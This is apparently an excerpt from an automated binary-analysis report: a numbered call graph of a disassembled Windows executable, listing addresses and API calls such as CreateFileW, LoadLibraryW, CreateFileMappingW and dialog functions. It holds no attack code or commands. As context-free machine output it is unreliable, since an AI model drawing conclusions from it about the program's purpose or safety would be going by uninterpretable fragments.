df13b3 LCMapStringW 31781 def793 31780->31781 31781->31762 31781->31763 31781->31768 31782->31773 31783->31768 31784->31768 31785->31751 31787 df1134 _unexpected 5 API calls 31786->31787 31788 df104b 31787->31788 31788->31781 31789 df13bf LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 31788->31789 31789->31780 31790->31721 31971 de38c0 31791->31971 31794 dd664f GetProcAddress 31796 dd6661 31794->31796 31797 dd6670 GetProcAddress 31794->31797 31795 dd6698 31798 dd6a29 31795->31798 32018 dec55a 42 API calls CallUnexpected 31795->32018 31796->31797 31797->31795 31799 dd6682 31797->31799 31800 dd19a6 42 API calls 31798->31800 31799->31795 31802 dd6a34 31800->31802 31973 dd092c 31802->31973 31803 dd6911 31803->31798 31805 dd691c 31803->31805 31806 dd19a6 42 API calls 31805->31806 31807 dd6927 31806->31807 31809 dd6943 CreateFileW 31807->31809 31810 dd6955 SetFilePointer 31809->31810 31811 dd6a13 CloseHandle 31809->31811 31810->31811 31813 dd6969 ReadFile 31810->31813 32023 dc1e5c 31811->32023 31813->31811 31816 dd698d 31813->31816 31814 dc1d16 41 API calls 31825 dd6a4c 31814->31825 31818 dd6d21 31816->31818 31819 dd69a1 31816->31819 31817 dd6a7e CompareStringW 31817->31825 32035 de2acd SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 31818->32035 31821 dc1d16 41 API calls 31819->31821 31823 dd69bd 31821->31823 31826 dc21e6 41 API calls 31823->31826 31824 dd6d26 31825->31814 31825->31817 31838 dd6b00 31825->31838 31977 dd011a 31825->31977 31982 dd6d27 31825->31982 32002 dd0b84 31825->32002 32006 dcf2f2 31825->32006 31842 dd69c8 31826->31842 31827 dd6b62 31829 dd6b79 31827->31829 31835 dd6ced 31827->31835 32024 dd0d7c 41 API calls 31829->32024 31832 dc1d16 41 API calls 31832->31838 31833 dd6b84 31834 dd011a 6 API calls 31833->31834 31837 dd6b89 31834->31837 31841 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 31835->31841 31836 dd0b84 41 API calls 31836->31838 31839 dd6c4a 31837->31839 31840 dd6b94 31837->31840 31838->31827 31838->31832 31838->31836 31850 dcf2f2 45 API calls 31838->31850 31845 dd6223 45 API calls 31839->31845 31844 dd6d27 43 API calls 31840->31844 31846 dd6d1a 31841->31846 31843 dd6a03 31842->31843 31847 dd6d27 43 API calls 31842->31847 32019 dd5fc9 31842->32019 31843->31811 31848 dd6b9e 31844->31848 31849 dd6c81 AllocConsole 31845->31849 31867 dd1a88 31846->31867 31847->31842 31851 dd6d27 43 API calls 31848->31851 31852 dd6c8e GetCurrentProcessId AttachConsole 31849->31852 31853 dd6c3a 31849->31853 31850->31838 31854 dd6ba8 31851->31854 31855 dd6ca6 31852->31855 31857 dd6ce5 ExitProcess 31853->31857 32025 dd4055 31854->32025 31860 dd6cad GetStdHandle WriteConsoleW Sleep FreeConsole 31855->31860 31860->31853 31862 dd4055 41 API calls 31863 dd6c18 31862->31863 31864 dc1d16 41 API calls 31863->31864 31865 dd6c24 31864->31865 32032 ddcace 31865->32032 32278 df8213 31867->32278 31869 dd1a94 GetCurrentDirectoryW 31870 dd1aa8 31869->31870 31872 dd1aa4 CallUnexpected 31869->31872 31871 dc1a88 41 API calls 31870->31871 31873 dd1ab2 31871->31873 31872->31371 31874 dd1ac7 GetCurrentDirectoryW 31873->31874 31875 dd1ad9 31874->31875 32279 dc1279 41 API calls 31875->32279 31877 dd1ae1 31878 dc189d 39 API calls 31877->31878 31878->31872 31880 dd6d27 43 API calls 31879->31880 31881 ddd17f 31880->31881 31882 ddd1ac GdiplusStartup SHGetMalloc 31881->31882 31882->31373 31884 dc21f3 31883->31884 32280 dc2166 31884->32280 31886 dc21f8 31886->31376 31888 dc3060 41 API calls 31887->31888 31889 ddea14 31888->31889 31890 dc3060 41 API calls 31889->31890 31891 ddea20 31890->31891 31892 dc3060 41 API calls 31891->31892 31893 ddea2c 31892->31893 31894 dc3060 41 API calls 31893->31894 31895 ddea38 31894->31895 31895->31383 31897 dc1d25 31896->31897 31898 dc1c0e 41 API calls 31897->31898 31899 dc1d3f 31898->31899 31900 ddead5 31899->31900 31901 ddeae1 __EH_prolog3_GS 31900->31901 31902 dc21e6 41 API calls 31901->31902 31903 ddeaf2 31902->31903 31904 dd5fc9 41 API calls 31903->31904 31911 ddeb03 31904->31911 31905 ddec53 31906 df81f5 5 API calls 31905->31906 31907 ddec60 31906->31907 31907->31392 31908 dc21e6 41 API calls 31908->31911 31909 dd5fc9 41 API calls 31909->31911 31910 dc855e 41 API calls 31910->31911 31911->31905 31911->31908 31911->31909 31911->31910 31912 dc3060 41 API calls 31911->31912 32285 dd4c9a 88 API calls 31911->32285 31912->31911 31915 ddea64 __EH_prolog3_GS 31914->31915 31916 ddea6b SetEnvironmentVariableW 31915->31916 31917 dc21e6 41 API calls 31916->31917 31918 ddea7f 31917->31918 31919 dd5fc9 41 API calls 31918->31919 31923 ddea95 31919->31923 31920 ddeac7 31921 df81f5 5 API calls 31920->31921 31922 ddead4 31921->31922 31922->31406 31923->31920 31924 ddeabb SetEnvironmentVariableW 31923->31924 31924->31920 31926 dd19b2 __EH_prolog3 31925->31926 31927 dc1a88 41 API calls 31926->31927 31928 dd19c5 31927->31928 31929 dd1a19 31928->31929 31935 dd19d8 31928->31935 31930 dc1d16 41 API calls 31929->31930 31931 dd1a29 31930->31931 31933 dc189d 39 API calls 31931->31933 31932 dd19e7 GetModuleFileNameW 31932->31935 31934 dd1a31 CallUnexpected 31933->31934 31934->31388 31935->31928 31935->31929 31935->31932 32286 dc2586 41 API calls 31935->32286 31938 dc306c 31937->31938 31939 dc3082 31938->31939 32287 dc1e02 39 API calls 31938->32287 31939->31393 31941 dc3077 32288 dc16e6 31941->32288 31944 dcf832 43 API calls 31943->31944 31945 dcf86f SetEnvironmentVariableW GetModuleHandleW LoadIconW 31944->31945 31946 dd28c9 31945->31946 32292 dd28f1 31946->32292 31950 dd28dd 31950->31410 31952 ddb846 __EH_prolog3 31951->31952 31953 dc21e6 41 API calls 31952->31953 31954 ddb853 31953->31954 32449 de2853 31954->32449 31956 ddb870 CallUnexpected 31956->31413 31958 ddb8c4 31957->31958 31959 deba9e ___std_exception_destroy 14 API calls 31958->31959 31960 ddb8cc 31959->31960 31961 deba9e ___std_exception_destroy 14 API calls 31960->31961 31962 ddb8d4 31961->31962 31962->31421 31964 ddd204 GdiplusShutdown CoUninitialize 31963->31964 31964->31440 31966->31414 31967->31422 31968->31426 31969->31429 31970->31437 31972 dd6621 GetModuleHandleW 31971->31972 31972->31794 31972->31795 31974 dd0943 31973->31974 32036 dc855e 31974->32036 31978 dd016d 31977->31978 31979 dd0140 GetVersionExW 31977->31979 31980 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 31978->31980 31979->31978 31981 dd0196 31980->31981 31981->31825 31983 dd6d33 __EH_prolog3_GS 31982->31983 32061 dc1a88 31983->32061 31985 dd6d43 31986 dd6d57 GetSystemDirectoryW 31985->31986 31987 dd6d63 31986->31987 32001 dd6dc9 31986->32001 31988 dc21e6 41 API calls 31987->31988 31990 dd6d6b 31988->31990 31992 dc1d16 41 API calls 31990->31992 31994 dd6d78 31992->31994 31996 dc1d16 41 API calls 31994->31996 31995 dd6dd8 31995->31825 31997 dd6d8d 31996->31997 32065 dd0d19 31997->32065 31999 dd6da0 32000 dd6db8 LoadLibraryW 31999->32000 32000->32001 32077 dc189d 32001->32077 32003 dd0b8f 32002->32003 32124 dd1b62 32003->32124 32007 dcf2fe __EH_prolog3_GS 32006->32007 32008 dcf305 GetFileAttributesW 32007->32008 32009 dcf313 32008->32009 32016 dcf33e 32008->32016 32011 dc21e6 41 API calls 32009->32011 32010 df81f5 5 API calls 32012 dcf34d 32010->32012 32013 dcf31b 32011->32013 32012->31825 32134 dd1520 32013->32134 32015 dcf329 32015->32016 32017 dcf335 GetFileAttributesW 32015->32017 32016->32010 32017->32016 32018->31803 32022 dd5fda 32019->32022 32020 dd6000 32020->31842 32021 dc8584 41 API calls 32021->32022 32022->32020 32022->32021 32024->31833 32026 dd4067 32025->32026 32185 dd400c 32026->32185 32029 dd6223 32206 dd623c 32029->32206 32033 ddcada 32032->32033 32034 ddcafa MessageBoxW 32033->32034 32034->31853 32035->31824 32039 dc85dc 32036->32039 32040 dc85ed 32039->32040 32045 dc5fc6 32040->32045 32042 dc85f9 32050 dc1c0e 32042->32050 32044 dc8572 32044->31825 32046 dc5fcf 32045->32046 32047 dc5fd2 32045->32047 32046->32042 32058 dc5fd8 41 API calls 32047->32058 32051 dc1c1a 32050->32051 32052 dc1cfb 32051->32052 32055 dc1c26 32051->32055 32060 dc1aa7 41 API calls std::_Xinvalid_argument 32052->32060 32057 dc1c44 32055->32057 32059 dc2066 41 API calls 32055->32059 32057->32044 32059->32057 32062 dc1a98 32061->32062 32084 dc1a4d 32062->32084 32066 dd0d25 __EH_prolog3_GS 32065->32066 32092 dc8cb5 32066->32092 32068 dd0d35 32070 dd0d58 32068->32070 32104 dd0cf6 41 API calls 32068->32104 32096 dc1274 32070->32096 32074 dd0d6c 32075 df81f5 5 API calls 32074->32075 32076 dd0d79 32075->32076 32076->31999 32078 dc192e 32077->32078 32079 dc1945 32078->32079 32123 dc1def 39 API calls 32078->32123 32081 df81f5 32079->32081 32082 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32081->32082 32083 df81ff 32082->32083 32083->32083 32085 dc1a5a 32084->32085 32086 dc1a83 32084->32086 32090 dc1906 41 API calls 32085->32090 32086->31985 32088 dc1a62 32091 dc192e 39 API calls 32088->32091 32090->32088 32091->32086 32093 dc8cc5 32092->32093 32105 dc8bf1 32093->32105 32095 dc8cda 32095->32068 32097 dc12a1 32096->32097 32117 dc12bd 32097->32117 32099 dc12b9 32100 dc335d 32099->32100 32102 dc336b 32100->32102 32101 dc337f 32101->32074 32102->32101 32122 dc1827 41 API calls 32102->32122 32104->32070 32106 dc8bfd 32105->32106 32107 dc8caf 32106->32107 32109 dc8c09 32106->32109 32116 dc1aa7 41 API calls std::_Xinvalid_argument 32107->32116 32111 dc8c27 32109->32111 32115 dc2066 41 API calls 32109->32115 32111->32095 32115->32111 32118 dc1307 32117->32118 32120 dc12d2 32117->32120 32121 dc13b8 41 API calls 32118->32121 32120->32099 32121->32120 32122->32101 32123->32079 32125 dd1b71 32124->32125 32128 dd1b83 32125->32128 32127 dd0b99 32127->31825 32129 dc5fc6 41 API calls 32128->32129 32130 dd1b96 32129->32130 32131 dd1baa 32130->32131 32133 dd1f00 41 API calls _wcsrchr 32130->32133 32131->32127 32133->32131 32135 dd152c __EH_prolog3_GS 32134->32135 32136 dd1539 32135->32136 32137 dc1d16 41 API calls 32135->32137 32138 df81f5 5 API calls 32136->32138 32139 dd154d 32137->32139 32140 dd173b 32138->32140 32141 dd1561 32139->32141 32142 dd1622 32139->32142 32140->32015 32145 dd156f 32141->32145 32154 dd1591 32141->32154 32143 dc21e6 41 API calls 32142->32143 32144 dd162a 32143->32144 32146 dd1a88 43 API calls 32144->32146 32177 dd1db0 41 API calls 32145->32177 32150 dd1636 32146->32150 32148 dd157b 32149 dc3060 41 API calls 32148->32149 32149->32136 32150->32136 32151 dd16b3 32150->32151 32152 dd1652 32150->32152 32183 dd1db0 41 API calls 32151->32183 32180 dd1e3b 41 API calls 32152->32180 32154->32136 32156 dc855e 41 API calls 32154->32156 32155 dd16c2 32158 dc3060 41 API calls 32155->32158 32159 dd15d8 32156->32159 32161 dd16ca 32158->32161 32178 dd1d51 41 API calls 32159->32178 32160 dd166a 32181 dc135e 41 API calls 32160->32181 32184 dd0cf6 41 API calls 32161->32184 32164 dd15f0 32179 dcda96 41 API calls 32164->32179 32165 dd167a 32182 dd1e10 41 API calls 32165->32182 32169 dd15ff 32172 dc3060 41 API calls 32169->32172 32170 dd168c 32171 dc3060 41 API calls 32170->32171 32171->32136 32172->32136 32173 dd16d9 32174 dc855e 41 API calls 32173->32174 32175 dd170d 32174->32175 32176 dc1274 41 API calls 32175->32176 32176->32136 32177->32148 32178->32164 32179->32169 32180->32160 32181->32165 32182->32170 32183->32155 32184->32173 32191 dd32c3 32185->32191 32188 dd404d 32188->32029 32189 dd4026 LoadStringW 32189->32188 32190 dd403e LoadStringW 32189->32190 32190->32188 32198 dd31cd 32191->32198 32194 dd32f9 32196 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32194->32196 32197 dd330d 32196->32197 32197->32188 32197->32189 32201 dd31e6 32198->32201 32199 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32200 dd3257 32199->32200 32200->32194 32204 dd325b 39 API calls 32200->32204 32203 dd322b _strncpy 32201->32203 32205 dec033 39 API calls 2 library calls 32201->32205 32203->32199 32204->32194 32205->32203 32207 dd6248 __EH_prolog3_GS 32206->32207 32208 dc21e6 41 API calls 32207->32208 32209 dd6261 32208->32209 32221 dd617d 32209->32221 32214 dd62cf 32215 dd62e8 32214->32215 32233 dc87c5 41 API calls 32214->32233 32219 df81f5 5 API calls 32215->32219 32217 dd6280 32217->32214 32229 dc87c5 41 API calls 32217->32229 32230 dd64b7 32217->32230 32220 dd6237 32219->32220 32220->31862 32222 dd621e 32221->32222 32223 dd6192 32221->32223 32225 dcddb0 32222->32225 32223->32222 32224 dc147e 41 API calls 32223->32224 32224->32223 32226 dcddbf 32225->32226 32234 dcdcbb 32226->32234 32228 dcddca 32228->32217 32229->32217 32246 dcf832 32230->32246 32233->32215 32235 dcdcc7 32234->32235 32236 dcddaa 32235->32236 32238 dcdcd3 32235->32238 32245 dc1aa7 41 API calls std::_Xinvalid_argument 32236->32245 32243 dcdcf1 32238->32243 32244 dc2066 41 API calls 32238->32244 32243->32228 32244->32243 32247 dcf843 32246->32247 32250 deb8d2 32247->32250 32251 deb8e6 CallUnexpected 32250->32251 32256 de811b 32251->32256 32257 de816a 32256->32257 32258 de8147 32256->32258 32257->32258 32260 de8172 32257->32260 32273 de79b2 39 API calls CallUnexpected 32258->32273 32274 dea26d 43 API calls CallUnexpected 32260->32274 32261 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32262 de829c 32261->32262 32267 de776b 32262->32267 32265 de81f3 32275 de9d38 14 API calls ___free_lconv_mon 32265->32275 32266 de815f 32266->32261 32268 de7777 32267->32268 32269 de778e 32268->32269 32276 de7816 39 API calls CallUnexpected 32268->32276 32271 dcf84d 32269->32271 32277 de7816 39 API calls CallUnexpected 32269->32277 32271->32217 32273->32266 32274->32265 32275->32266 32276->32269 32277->32271 32278->31869 32279->31877 32281 dc2195 32280->32281 32282 dc21a7 32281->32282 32284 dc2066 41 API calls 32281->32284 32282->31886 32284->32282 32285->31911 32286->31935 32287->31941 32289 dc16f3 32288->32289 32290 dc2166 41 API calls 32289->32290 32291 dc173e 32290->32291 32291->31939 32293 dd290c ___scrt_uninitialize_crt 32292->32293 32294 dc21e6 41 API calls 32293->32294 32295 dd292e 32294->32295 32296 dd294f 32295->32296 32297 dd2973 32295->32297 32412 dd1a39 42 API calls 2 library calls 32296->32412 32299 dc335d 41 API calls 32297->32299 32303 dd2966 32299->32303 32300 dd295a 32301 dc3060 41 API calls 32300->32301 32301->32303 32360 dce36e 32303->32360 32306 dd2c39 32405 dce3df 32306->32405 32308 dd2e45 32311 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32308->32311 32309 dd3983 41 API calls 32310 dd29a2 32309->32310 32310->32306 32310->32309 32313 dd29e6 32310->32313 32312 dd28d8 32311->32312 32358 dd319b GetModuleHandleW FindResourceW 32312->32358 32383 debac0 32313->32383 32315 dd2a00 32316 debac0 39 API calls 32315->32316 32327 dd2a20 ___vcrt_FlsFree 32316->32327 32317 dd2b6e 32317->32306 32414 dceb40 85 API calls 32317->32414 32320 dd2b88 32415 dec028 32320->32415 32324 dce910 88 API calls 32326 dd2bae 32324->32326 32328 dec028 ___std_exception_copy 15 API calls 32326->32328 32330 dd2bbf 32326->32330 32327->32306 32327->32317 32391 dced30 32327->32391 32400 dce910 32327->32400 32413 dceb40 85 API calls 32327->32413 32329 dd2bd6 32328->32329 32329->32306 32422 dd8100 MultiByteToWideChar 32329->32422 32332 dec028 ___std_exception_copy 15 API calls 32330->32332 32335 dd2c28 32332->32335 32333 dd2bf2 32423 deba9e 32333->32423 32336 dd2c33 32335->32336 32354 dd2c3f ___vcrt_FlsFree 32335->32354 32337 deba9e ___std_exception_destroy 14 API calls 32336->32337 32337->32306 32338 dd2d7a 32426 dd3110 41 API calls 32338->32426 32340 dd2d8c 32341 deba9e ___std_exception_destroy 14 API calls 32340->32341 32342 dd2d92 32341->32342 32343 deba9e ___std_exception_destroy 14 API calls 32342->32343 32347 dd2d99 32343->32347 32345 dd3983 41 API calls 32345->32347 32346 dd80d1 WideCharToMultiByte 32346->32354 32347->32345 32348 dd2dee 32347->32348 32349 debac0 39 API calls 32348->32349 32352 dd2e17 32349->32352 32350 dd310a 32430 de2acd SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 32350->32430 32355 debac0 39 API calls 32352->32355 32353 dd310f 32354->32338 32354->32346 32354->32350 32427 dd3fed 44 API calls 32354->32427 32428 dec033 39 API calls 2 library calls 32354->32428 32429 dd3110 41 API calls 32354->32429 32355->32306 32359 dd31b5 32358->32359 32359->31950 32361 dc21e6 41 API calls 32360->32361 32362 dce37f 32361->32362 32363 dce450 32362->32363 32364 dce45f __EH_prolog3_GS 32363->32364 32431 dca722 32364->32431 32366 dce4b4 32367 dce4da CreateFileW 32366->32367 32368 dce4ec GetLastError 32367->32368 32377 dce547 32367->32377 32369 dc21e6 41 API calls 32368->32369 32370 dce500 32369->32370 32372 dd1520 43 API calls 32370->32372 32371 dce5a9 32375 dce5cd 32371->32375 32378 dc335d 41 API calls 32371->32378 32374 dce512 32372->32374 32373 dce583 SetFileTime 32373->32371 32376 dce516 32374->32376 32374->32377 32380 df81f5 5 API calls 32375->32380 32379 dce52b CreateFileW GetLastError 32376->32379 32377->32371 32377->32373 32378->32375 32379->32377 32381 dce543 32379->32381 32382 dce5e3 32380->32382 32381->32377 32382->32310 32384 debafa 32383->32384 32390 debb0e 32384->32390 32434 dee1e7 14 API calls __dosmaperr 32384->32434 32386 debb03 32435 de7a2f 39 API calls CallUnexpected 32386->32435 32388 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32389 debb1b 32388->32389 32389->32315 32390->32388 32392 dced42 32391->32392 32395 dced50 32391->32395 32393 dced60 32392->32393 32436 dc9ee3 83 API calls 32392->32436 32393->32327 32395->32393 32396 dced68 SetFilePointer 32395->32396 32396->32393 32397 dced84 GetLastError 32396->32397 32397->32393 32398 dced8e 32397->32398 32398->32393 32437 dc9ee3 83 API calls 32398->32437 32401 dce924 32400->32401 32404 dce92b 32400->32404 32401->32327 32403 dcea9d GetStdHandle ReadFile GetLastError GetLastError GetFileType 32403->32404 32404->32401 32404->32403 32438 dc9e66 83 API calls 32404->32438 32406 dce411 32405->32406 32409 dce422 32405->32409 32407 dce41d 32406->32407 32408 dce424 32406->32408 32406->32409 32445 dce777 45 API calls 32407->32445 32439 dce730 32408->32439 32409->32308 32412->32300 32413->32327 32414->32320 32420 dee234 _unexpected 32415->32420 32416 dee272 32448 dee1e7 14 API calls __dosmaperr 32416->32448 32417 dee25d RtlAllocateHeap 32419 dd2b92 32417->32419 32417->32420 32419->32306 32419->32324 32420->32416 32420->32417 32447 dec80e EnterCriticalSection LeaveCriticalSection _unexpected 32420->32447 32422->32333 32424 dee1fa ___free_lconv_mon 14 API calls 32423->32424 32425 debab6 32424->32425 32425->32330 32426->32340 32427->32354 32428->32354 32429->32354 32430->32353 32432 dc21e6 41 API calls 32431->32432 32433 dca72a 32432->32433 32433->32366 32434->32386 32435->32390 32436->32395 32437->32393 32438->32404 32440 dce73d 32439->32440 32442 dce757 32439->32442 32440->32442 32443 dce749 CloseHandle 32440->32443 32441 dce771 32441->32409 32442->32441 32446 dc9e3d 83 API calls 32442->32446 32443->32442 32445->32409 32446->32441 32447->32420 32448->32419 32451 de2858 32449->32451 32450 dec028 ___std_exception_copy 15 API calls 32450->32451 32451->32450 32452 de2872 32451->32452 32454 de2874 32451->32454 32462 dec80e EnterCriticalSection LeaveCriticalSection _unexpected 32451->32462 32452->31956 32455 dc2039 32454->32455 32456 de287e 32454->32456 32460 dc2062 32455->32460 32461 de615b RaiseException 32455->32461 32463 de615b RaiseException 32456->32463 32459 de3328 32460->31956 32461->32455 32462->32451 32463->32459 32465 decba6 32464->32465 32466 decb94 32464->32466 32476 deca13 32465->32476 32491 de36aa GetModuleHandleW 32466->32491 32469 decb99 32469->32465 32492 decc48 GetModuleHandleExW 32469->32492 32471 de32c5 32471->31451 32474 decbf8 32477 deca1f __FrameHandler3::FrameUnwindToState 32476->32477 32498 def941 EnterCriticalSection 32477->32498 32479 deca29 32499 deca7f 32479->32499 32481 deca36 32503 deca54 32481->32503 32484 decbfe 32508 decc2f 32484->32508 32486 decc08 32487 decc1c 32486->32487 32488 decc0c GetCurrentProcess TerminateProcess 32486->32488 32489 decc48 CallUnexpected 3 API calls 32487->32489 32488->32487 32490 decc24 ExitProcess 32489->32490 32491->32469 32493 decca8 32492->32493 32494 decc87 GetProcAddress 32492->32494 32495 deccae FreeLibrary 32493->32495 32496 decba5 32493->32496 32494->32493 32497 decc9b 32494->32497 32495->32496 32496->32465 32497->32493 32498->32479 32501 deca8b __FrameHandler3::FrameUnwindToState CallUnexpected 32499->32501 32502 decaef CallUnexpected 32501->32502 32506 ded4f3 14 API calls 2 library calls 32501->32506 32502->32481 32507 def991 LeaveCriticalSection 32503->32507 32505 deca42 32505->32471 32505->32484 32506->32502 32507->32505 32511 def9cd 5 API calls CallUnexpected 32508->32511 32510 decc34 CallUnexpected 32510->32486 32511->32510 32512 ddec70 32513 ddec81 __EH_prolog3_catch_GS_align 32512->32513 32693 dc234f 32513->32693 32518 dded4c 32524 ddedde 32518->32524 32528 dded62 32518->32528 32519 ddecc5 32522 ddecca 32519->32522 32523 dded14 32519->32523 32521 ddfa2e 32532 dc21e6 41 API calls 32522->32532 32646 ddeccf 32522->32646 32864 dc2215 GetDlgItem ShowWindow 32523->32864 32699 dc22be 32524->32699 32525 dd4055 41 API calls 32529 ddf61b 32525->32529 32533 dd4055 41 API calls 32528->32533 32534 dd6223 45 API calls 32529->32534 32531 dded20 32536 dded3d EndDialog 32531->32536 32531->32646 32537 ddecde 32532->32537 32538 dded7f SetDlgItemTextW 32533->32538 32539 ddf625 32534->32539 32536->32646 32542 dd4055 41 API calls 32537->32542 32543 dded89 32538->32543 32760 dc2336 32539->32760 32541 ddedfd 32712 dd0395 32541->32712 32546 ddecf1 32542->32546 32549 ddeda4 GetMessageW 32543->32549 32543->32646 32544 ddf63a 32763 ddcb0a FindResourceW 32544->32763 32863 dc11b0 42 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 32546->32863 32552 ddedb9 IsDialogMessageW 32549->32552 32549->32646 32551 ddecfa 32556 dc2336 SetDlgItemTextW 32551->32556 32551->32646 32552->32543 32554 ddedc8 TranslateMessage DispatchMessageW 32552->32554 32554->32543 32556->32646 32557 ddf6a1 SendDlgItemMessageW 32559 ddf6cb SendMessageW 32557->32559 32560 ddf6da 32557->32560 32558 ddeeb7 GetDlgItem 32562 ddeecf SendMessageW SendMessageW 32558->32562 32563 ddeefb SetFocus 32558->32563 32559->32560 32564 ddf6f0 GetDlgItem SendMessageW 32560->32564 32565 ddf6e3 SendDlgItemMessageW 32560->32565 32561 ddee96 KiUserCallbackDispatcher 32680 ddee02 32561->32680 32562->32563 32563->32680 32568 dc21e6 41 API calls 32564->32568 32565->32564 32566 ddf65c DeleteObject 32569 ddcb0a 11 API calls 32566->32569 32567 dc8cb5 41 API calls 32567->32680 32571 ddf71a 32568->32571 32572 ddf66d 32569->32572 32570 ddf4e8 32573 dd4055 41 API calls 32570->32573 32576 dd1a88 43 API calls 32571->32576 32882 ddc795 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 32572->32882 32574 ddf4f9 SetDlgItemTextW 32573->32574 32584 ddf508 32574->32584 32579 ddf726 GetDlgItem 32576->32579 32578 dc1d16 41 API calls 32578->32680 32581 ddf741 32579->32581 32580 ddf67b 32883 ddc774 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 32580->32883 32782 dc22aa 32581->32782 32583 ddf685 32884 ddc7ff 11 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 32583->32884 32587 dd4055 41 API calls 32584->32587 32586 ddf693 DeleteObject 32586->32557 32589 ddf52d 32587->32589 32592 dc1d16 41 API calls 32589->32592 32590 ddf751 32785 ddc5ee GetClassNameW 32590->32785 32595 ddf539 32592->32595 32602 dd4055 41 API calls 32595->32602 32626 ddf586 32595->32626 32596 ddd883 22 API calls 32596->32680 32599 dd4055 41 API calls 32601 ddf5a7 32599->32601 32600 ddefd6 GetLastError 32600->32680 32604 dc1d16 41 API calls 32601->32604 32606 ddf555 32602->32606 32608 ddf5b0 32604->32608 32609 dc1d16 41 API calls 32606->32609 32607 ddf767 32610 ddf78d 32607->32610 32614 ddfb52 65 API calls 32607->32614 32619 dc1d16 41 API calls 32608->32619 32612 ddf567 32609->32612 32617 dd4055 41 API calls 32610->32617 32627 ddf7be 32610->32627 32611 ddf000 GetLastError 32611->32680 32881 dc138d 41 API calls 32612->32881 32614->32610 32616 ddf576 32621 dc1274 41 API calls 32616->32621 32622 ddf7a0 SetDlgItemTextW 32617->32622 32618 ddf02e GetTickCount 32870 dc62c5 41 API calls 32618->32870 32624 ddf5cb 32619->32624 32620 dc2215 GetDlgItem ShowWindow 32620->32680 32621->32626 32630 dd4055 41 API calls 32622->32630 32625 ddcace MessageBoxW 32624->32625 32658 ddf5de 32625->32658 32626->32599 32647 ddf887 32627->32647 32810 ddfb52 32627->32810 32628 dd19a6 42 API calls 32628->32680 32629 dd4055 41 API calls 32629->32680 32634 ddf7b4 SetDlgItemTextW 32630->32634 32633 ddf971 32638 ddf9b4 32633->32638 32908 dc21fd GetDlgItem 32633->32908 32634->32627 32637 dd4055 41 API calls 32640 ddf40f SetDlgItemTextW 32637->32640 32639 ddf9dd 32638->32639 32649 ddf9d5 SendMessageW 32638->32649 32639->32646 32651 dd4055 41 API calls 32639->32651 32878 dc2215 GetDlgItem ShowWindow 32640->32878 32642 ddf9a8 32909 dc21fd GetDlgItem 32642->32909 32643 dce36e 41 API calls 32692 ddefb8 __InternalCxxFrameHandler 32643->32692 32645 ddf80e 32652 ddf87c 32645->32652 32653 ddf817 SetForegroundWindow 32645->32653 32910 df880f 5 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 32646->32910 32647->32633 32655 dc21e6 41 API calls 32647->32655 32649->32639 32650 ddf425 SetDlgItemTextW GetDlgItem 32650->32680 32659 ddf9f6 SetDlgItemTextW 32651->32659 32657 ddfb52 65 API calls 32652->32657 32653->32652 32660 ddf827 32653->32660 32654 dc138d 41 API calls 32654->32680 32685 ddf8be 32655->32685 32657->32647 32743 ddd4c3 32658->32743 32659->32646 32660->32652 32663 ddfb52 65 API calls 32660->32663 32661 ddf7d8 32661->32645 32885 ddb8f1 ShowWindow 32661->32885 32662 dd6223 45 API calls 32662->32680 32668 ddf83b 32663->32668 32664 ddf082 GetLastError 32664->32692 32665 ddf94c 32671 ddb8f1 54 API calls 32665->32671 32666 ddf44b SetWindowLongW 32666->32680 32668->32652 32673 ddf849 DialogBoxParamW 32668->32673 32669 dce3df 88 API calls 32669->32692 32671->32633 32672 dd4055 41 API calls 32672->32685 32673->32652 32674 ddf867 EndDialog 32673->32674 32674->32646 32675 dc1d16 41 API calls 32675->32685 32676 ddf188 GetCommandLineW 32676->32692 32679 ddd82d 41 API calls 32679->32692 32680->32558 32680->32561 32680->32567 32680->32570 32680->32578 32680->32596 32680->32600 32680->32611 32680->32618 32680->32620 32680->32628 32680->32629 32680->32637 32680->32654 32680->32662 32680->32666 32680->32676 32682 ddcace MessageBoxW 32680->32682 32684 ddfb52 65 API calls 32680->32684 32680->32692 32720 de1349 32680->32720 32731 dcf07c 32680->32731 32740 dd1a76 32680->32740 32865 ddd44d 41 API calls __EH_prolog3_GS 32680->32865 32866 dcf2c4 32680->32866 32873 dd4c5a 88 API calls 32680->32873 32877 dcb4b0 41 API calls 32680->32877 32879 dde21b 217 API calls __EH_prolog3_catch_GS 32680->32879 32880 dc21fd GetDlgItem 32680->32880 32682->32680 32683 dc1274 41 API calls 32683->32685 32684->32680 32685->32665 32685->32672 32685->32675 32685->32683 32907 dc138d 41 API calls 32685->32907 32688 ddf201 CreateFileMappingW 32689 ddf22a MapViewOfFile 32688->32689 32688->32692 32689->32692 32690 ddf2f5 UnmapViewOfFile CloseHandle 32690->32692 32691 ddf2c3 Sleep 32691->32692 32692->32643 32692->32664 32692->32669 32692->32679 32692->32680 